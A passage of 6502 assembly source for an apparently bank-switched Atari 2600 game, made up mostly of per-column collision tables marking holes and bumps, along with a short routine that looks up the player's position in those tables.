dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column12Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column13Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column14Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column15Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column16Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ;============================== ORG $EFF6 BANKS_AND_VECTORS ;============================== ;##################################################### ;##################################################### ;##################################################### ;### ### ;### Bank 4 below ### ;### ### ;##################################################### ;##################################################### ;##################################################### ;============ org $F000 ;============ JUMP_TABLE org $F018 rorg $F018 ;================= Bank4Code ;================= LDA Player0HPosition ; initial value 78 SEC SBC #16 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. ; number is 0-31 ; If 0-15, handle in previous bank ; If 16-31, handle in this bank CMP #16 BMI EdgeCaseCheckBank4 ; we take this branch if we got here at middle of screen position case ;BMI ReturntoBank2FromBank4 SEC SBC #16 TAX ; number is 0-15 for bank4 checks LDA ProcessTableLSBBank4,X STA ReturnAddress LDA ProcessTableMSBBank4,X STA ReturnAddress+1 ; Get the line LDA Player0VPosition ; initial value 189 SEC IF DEBUG = 1 SBC #1 ELSE SBC #3 ENDIF TAY LDA (ReturnAddress),Y ;=========== BNE FinishedProcessingBank4 ; otherwise, check if we're an edge-case EdgeCaseCheckBank4 LDA Player0HPosition ; initial value 78 SEC SBC #16 CLC ADC #4 ; go from bit zero to bit 4 (of 7). LSR LSR ; divide by 4. ; number is 0-31 ; If 0-15, handle in previous bank ; If 16-31, handle in this bank CMP #16 BMI ReturntoBank2FromBank4 ; should never hit SEC SBC #16 TAX ; number is 0-15 for bank4 checks LDA ProcessTableLSBBank4,X STA ReturnAddress LDA ProcessTableMSBBank4,X STA ReturnAddress+1 ; Get the line LDA Player0VPosition ; initial value 189 SEC IF DEBUG = 1 SBC #1 ELSE SBC #3 ENDIF TAY LDA (ReturnAddress),Y FinishedProcessingBank4 ;=========== STA CollisionStatusFromTable ReturntoBank2FromBank4 ;================= ; Return to Bank 1 ;================= JMP Bank2 ;================= ProcessTableLSBBank4 ; 17-24 .byte #<Column17Information .byte #<Column18Information .byte #<Column19Information .byte #<Column20Information .byte #<Column21Information .byte #<Column22Information .byte #<Column23Information .byte #<Column24Information ; 25-32 .byte #<Column25Information .byte #<Column26Information .byte #<Column27Information .byte #<Column28Information .byte #<Column29Information .byte #<Column30Information .byte #<Column31Information .byte #<Column32Information ProcessTableMSBBank4 ; 17-24 .byte #>Column17Information .byte #>Column18Information .byte #>Column19Information .byte #>Column20Information .byte #>Column21Information .byte #>Column22Information .byte #>Column23Information .byte #>Column24Information ; 25-32 .byte #>Column25Information .byte #>Column26Information .byte #>Column27Information .byte #>Column28Information .byte #>Column29Information .byte #>Column30Information .byte #>Column31Information .byte #>Column32Information ;================================= ; Column Information organization ;================================= ; Conditions handled (LSB): ; Nothing = %0000 ; Bump = %0001 ; Hole = %0010 ; Winning space = %0011 ; 8 angles ; Conditions handled (MSB): ; Slope = 0-15 ; Slope = UR/UL/DL/DR bump Column17Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b HOLE dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE Column18Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE Column19Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column20Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 